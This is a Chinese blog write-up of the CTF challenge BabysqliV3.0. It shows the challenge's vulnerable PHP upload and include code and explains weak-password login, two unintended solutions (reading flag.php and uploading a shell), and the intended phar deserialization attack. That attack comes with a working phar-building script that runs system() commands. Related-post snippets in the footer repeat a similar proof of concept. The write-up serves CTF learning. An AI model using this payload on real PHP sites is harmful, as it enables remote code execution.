[BabysqliV3.0]phar反序列化

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量658 收藏
点赞数
分类专栏: wp 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/132130634
版权

文章目录

[BabysqliV3.0]phar反序列化

开始以为是sql注入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ST1jvadM-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032140269.png)]

账号为:admin,一直试都没反应,后来发现可以弱口令,密码:password

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PKuBGWCd-1691302941344)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032141726.png)]

一个文件上传页面:

image-20230803214327490

在file参数存在文件包含:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eLLkRDru-1691302941345)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032143134.png)]

home.php

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
	if(isset($_GET['file'])){
		if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
			die("hacker!");
		}
		else{
			if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
				$file = $_GET['file'].".php";
			}
			else{
				$file = $_GET['file'].".fxxkyou!";
			}
			echo "当前引用的是 ".$file;
			require $file;
		}

	}
	else{
		die("no permission!");
	}
}
?>

upload.php

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<form action="" method="post" enctype="multipart/form-data">
	上传文件
	<input type="file" name="file" />
	<input type="submit" name="submit" value="上传" />
</form>

<?php
error_reporting(0);
class Uploader{
	public $Filename;
	public $cmd;
	public $token;


	function __construct(){
		$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
		$ext = ".txt";
		@mkdir($sandbox, 0777, true);
		if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}
		else{
			$this->Filename = $sandbox.$_SESSION['user'].$ext;
		}

		$this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
		$this->token = $_SESSION['user'];
	}

	function upload($file){
		global $sandbox;
		global $ext;

		if(preg_match("[^a-z0-9]", $this->Filename)){
			$this->cmd = "die('illegal filename!');";
		}
		else{
			if($file['size'] > 1024){
				$this->cmd = "die('you are too big (′▽`〃)');";
			}
			else{
				$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
			}
		}
	}

	function __toString(){
		global $sandbox;
		global $ext;
		// return $sandbox.$this->Filename.$ext;
		return $this->Filename;
	}

	function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}
}

if(isset($_FILES['file'])) {
	$uploader = new Uploader();
	$uploader->upload($_FILES["file"]);
	if(@file_get_contents($uploader)){
		echo "下面是你上传的文件:<br>".$uploader."<br>";
		echo file_get_contents($uploader);
	}
}

?>

这题有两个非预期解:

if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
			$this->Filename = $_GET['name'];
		}

if(@file_get_contents($uploader)){
    echo "下面是你上传的文件:<br>".$uploader."<br>";
    echo file_get_contents($uploader);
}

我们可以控制文件名的参数,并且获取文件名的文件内容

非预期解1:

我们直接读flag.php:

image-20230803214753704

非预期解2:

我们可以直接上传一个shell:

image-20230803214906141

预期解:

phar反序列化

难点主要是需要绕过:token

function __destruct(){
		if($this->token != $_SESSION['user']){
			$this->cmd = "die('check token falied!');";
		}
		eval($this->cmd);
	}

但是如果上次文件不加name参数,会讲session写入文件名:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6eEMtHuE-1691302941346)(https://raw.githubusercontent.com/leekosss/photoBed/master/202308032150189.png)]

随便上传一个文件,获取token

image-20230803215054939

构造phar文件:

<?php
    class Uploader{
	public $Filename;
	public $cmd = "system('tac /var/www/html/flag.php');";
	public $token = "GXY2088cabe1723182d413a31dd560b1766";
}

    @unlink("phar.phar");  //先删除存在的phar.phar
    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub('<?php __HALT_COMPILER(); ?>'); //设置stub
    $o = new Uploader();
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();

我们将phar文件上传上去:

image-20230803215159344

然后在文件名中包含phar://,配合file_get_contents()就会将phar反序列化,获得flag

image-20230803215235366

Leekos
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019]BabysqliV3.0 [phar]
qq_40327508的博客
11-25 1455
打开题目是登录界面,使用burp爆破出密码是password 登录 上传文件,以及url里有拼接file参数,可能有文件包含漏洞 使用php伪协议获取upload源码 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
[GXYCTF2019]BabysqliV3.0-phar反序列化正解
soldi_er的博客
06-08 491
文章目录phar反序列化漏洞利用条件构造payload文件漏洞利用参考收获   CSDN已经记录登录过程,弱口令登录,不再赘述。 phar反序列化漏洞利用条件   可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)upload.php可以上传文件。   (2)upload.php,具有执行命令的魔法函数。 class Uploader{ public $Filename; public $cmd; public $token; function __destr
[GXYCTF2019]BabysqliV3.0 phar反序列化
qq_54929891的博客
05-15 220
随便输入两个1 看来是要admin登录了,密码我起初以为通过万能密码可以绕过,结果没反应,最后试了一下top100爆破,出来了密码就是password 进入后看到url有一个file参数对应的是upload,页面提示我们现在是引用的upload.php文件,因此我们可以利用伪协议来读取源码了 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=u...
[GXYCTF2019]BabysqliV3.0-phar反序列化
soldi_er的博客
05-19 1000
文章目录前期漏洞探测探测SQL注入探测文件上传探测文件包含漏洞反序列化利用-审计源码宽字节概念函数addslashes() 前期漏洞探测 探测SQL注入   登陆框。   面对登陆框时,可以使用admin测试盲注。或者使用pw测。   先fuzz一波,返回的都是"no this user",没有防火墙提醒。   存在admin用户。在name中测7种闭合方式,都返回"no this user"。 admin'%23、')、'")、'))。"、")、"))。   这才贴合实战,要是实战基本就放弃了。一看就知
[GXYCTF2019]BabysqliV3.0
LYJ20010728的博客
05-19 923
[GXYCTF2019]BabysqliV3.0考点思路Payload预期解法非预期解法 考点 弱口令、PHP反序列化 思路 ①:题目页面提示我们应该是需要sqli注入,但是用它输入框提示的admin/password一试就进去了… ②:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload熟悉的形式,用php伪协议读取一下文件试试; ③:预期解法:审计 upload.php 代码,$this-&g
BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar反序列化pop链
u013119911的博客
06-30 1328
题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:即可进入 至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息, 在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计。 这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,......
ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现
qq_42942226的博客
11-07 821
ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现
BUUCTF--[GXYCTF2019]BabysqliV3.0
qq_46263951的博客
07-23 431
开始是一个登录页面,根据提示尝试万能密码,没啥用...这里尝试了几个弱口令就可以了 admin/password 使用伪协议读取文件内容?file=php://filter/read=convert.base64-encode/resource=upload <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype..
反序列化题解
2202_75361164的博客
11-05 100
[GYCTF2020]Easyphp,字符增多 [安洵杯 2019]不是文件上传,sql+反序列化 [GXYCTF2019]BabysqliV3.0,phar [EIS 2019]EzPOP
codecept.phar
09-23
codecept.phar 测试程序,移动该文件至 存放php 根目录中 存放 php.exe的地方 创建: codecept.bat 输入: ``` @php "%~dp0codecept.phar" %* ``` 使用说明:...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
composer.phar
02-03
composer.phar composer.phar composer.phar composer.phar
数字时代网络安全即服务的兴起
网络研究观
06-11 534
网络安全即服务是一种通过基于云的服务来管理安全需求的综合方法。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 187
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 939
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 583
安全漏洞扫描工具
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 859
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
phar反序列化poc
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值